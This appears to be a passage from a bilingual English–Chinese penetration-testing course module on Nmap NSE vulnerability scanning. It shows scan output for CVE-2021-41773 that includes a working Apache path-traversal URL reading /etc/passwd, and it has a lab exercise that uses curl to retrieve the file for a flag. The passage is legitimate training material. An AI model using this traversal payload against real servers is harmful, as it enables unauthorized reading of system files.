[sudo] password for kali: 
Starting Nmap 7.92 ( https://nmap.org )
NSE: Updating rule database.
NSE: Script Database updated successfully.
Nmap done: 0 IP addresses (0 hosts up) scanned in 0.54 seconds

Listing 6 - Copy the NSE Script and update the script.db database
清單 6 - 複製 NSE 文本並更新 script.db 資料庫

To use the NSE script, we'll provide the name of the script, target information, and port number. We'll also enable service detection.
若要使用 NSE 腳本,我們將提供腳本的名稱、目標資訊和埠號。我們還將啟用服務檢測。

kali@kali:~$ sudo nmap -sV -p 443 --script "http-vuln-cve2021-41773" 192.168.50.124
Starting Nmap 7.92 ( https://nmap.org )
Host is up (0.00069s latency).

PORT    STATE SERVICE VERSION
443/tcp open  http    Apache httpd 2.4.49 ((Unix))
| http-vuln-cve2021-41773:
|   VULNERABLE:
|   Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49
|     State: VULNERABLE
|               A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
|           
|     Disclosure date: 2021-10-05
|     Check results:
|       
|         Verify arbitrary file read: https://192.168.50.124:443/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
...
Nmap done: 1 IP address (1 host up) scanned in 6.86 seconds

Listing 7 - CVE-2021-41773 NSE Script
清單 7 - CVE-2021-41773 NSE 腳本

The output indicates that the target is vulnerable to CVE-2021-41773 and provides us with additional background information.
輸出表明目標容易受到 CVE-2021-41773 的攻擊,併為我們提供了額外的背景資訊。

While Nmap is not a vulnerability scanner in the traditional sense, we found that the NSE is a powerful feature that allows us to do lightweight vulnerability scanning. In a penetration test, we can use Nmap when there isn't a full-fledged vulnerability scanner available or when we want to verify findings from other tools.
雖然 Nmap 不是傳統意義上的漏洞掃描器,但我們發現 NSE 是一個強大的功能,允許我們進行輕量級漏洞掃描。在滲透測試中,當沒有成熟的漏洞掃描程式可用時,或者當我們想驗證其他工具的結果時,我們可以使用Nmap。

However, we have the same factors to consider as with any other vulnerability scanner. The NSE script categories can provide useful information, such as if a script is intrusive or safe, but we also need to keep in mind that an NSE script may contain malicious code that gives an attacker full access to our system. For that reason, we always need to verify that the NSE script not only provides the needed functionality, but is also safe.
但是,與任何其他漏洞掃描程序一樣,我們需要考慮相同的因素。NSE 腳本類別可以提供有用的資訊,例如腳本是侵入性的還是安全的,但我們還需要記住,NSE 腳本可能包含惡意代碼,使攻擊者能夠完全訪問我們的系統。因此,我們始終需要驗證 NSE 腳本不僅提供所需的功能,而且是否安全。

Resources 資源

Some of the labs require you to start the target machine(s) below.
某些實驗室要求您啟動以下目標計算機。

Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text and video.
請注意,分配給目標計算機的IP位址可能與模組文本和視頻中引用的IP位址不匹配。

Name
(Click to sort ascending)
IP Address
Vulnerability Scanning - Working with NSE Scripts - VM #1
漏洞掃描 - 使用 NSE 文本 - VM #1
Start Vulnerability Scanning - Working with NSE Scripts - VM #1 with Kali browser access

Labs 實驗室

  1. Capstone Labs: Follow the steps above to perform the vulnerability scan with the custom NSE script on VM #1. Copy the link from the script output after Verify arbitrary file read: and use it as a parameter for curl. This will retrieve the content of /etc/passwd of the target machine and display it. Be aware that you need to use http instead of https while keeping port 443 when you paste the link. Embed the last username of the file in the braces of "OS{}" and provide it as the answer to this exercise.
    Capstone Labs:按照上述步驟在 VM #1 上使用自定義 NSE 腳本執行漏洞掃描。在驗證任意文件讀取:之後,從腳本輸出中複製連結,並將其用作 curl 的參數。這將檢索目標機器的 /etc/passwd 的內容並顯示它。請注意,粘貼連結時需要使用 HTTP 而不是 HTTPs,同時保留埠 443。將文件的最後一個使用者名嵌入到“OS{}”的大括弧中,並將其作為本練習的答案。

7.4. Wrapping Up 7.4. 結束語

This Module has provided an overview of vulnerability scanning with Nessus and Nmap, and it provided insight into the different types and considerations of a vulnerability scan.
本模組概述了使用 Nessus 和 Nmap 進行漏洞掃描,並深入瞭解了漏洞掃描的不同類型和注意事項。

Vulnerability scanning can be extremely helpful during any kind of security assessment. Configured correctly, vulnerability scanning tools provide a wealth of meaningful data. It is important to understand that a manual review of the results is still required and that scanners can only discover vulnerabilities that they are configured for. Finally, we should always keep in mind that vulnerability scanning tools can perform actions that could be detrimental to some networks or targets, so we must exercise caution when using them.
在任何類型的安全評估中,漏洞掃描都非常有用。如果配置得當,漏洞掃描工具可提供大量有意義的數據。請務必瞭解,仍然需要手動查看結果,並且掃描程式只能發現為其配置的漏洞。最後,我們應該始終牢記,漏洞掃描工具可以執行可能對某些網路或目標有害的操作,因此我們在使用它們時必須謹慎行事。

Previous Module 上一個模組

Information Gathering 資訊收集

Next Module 下一個模組

Introduction to Web Application Attacks
Web 應用程式攻擊簡介

Learning Module 學習模組notes 筆記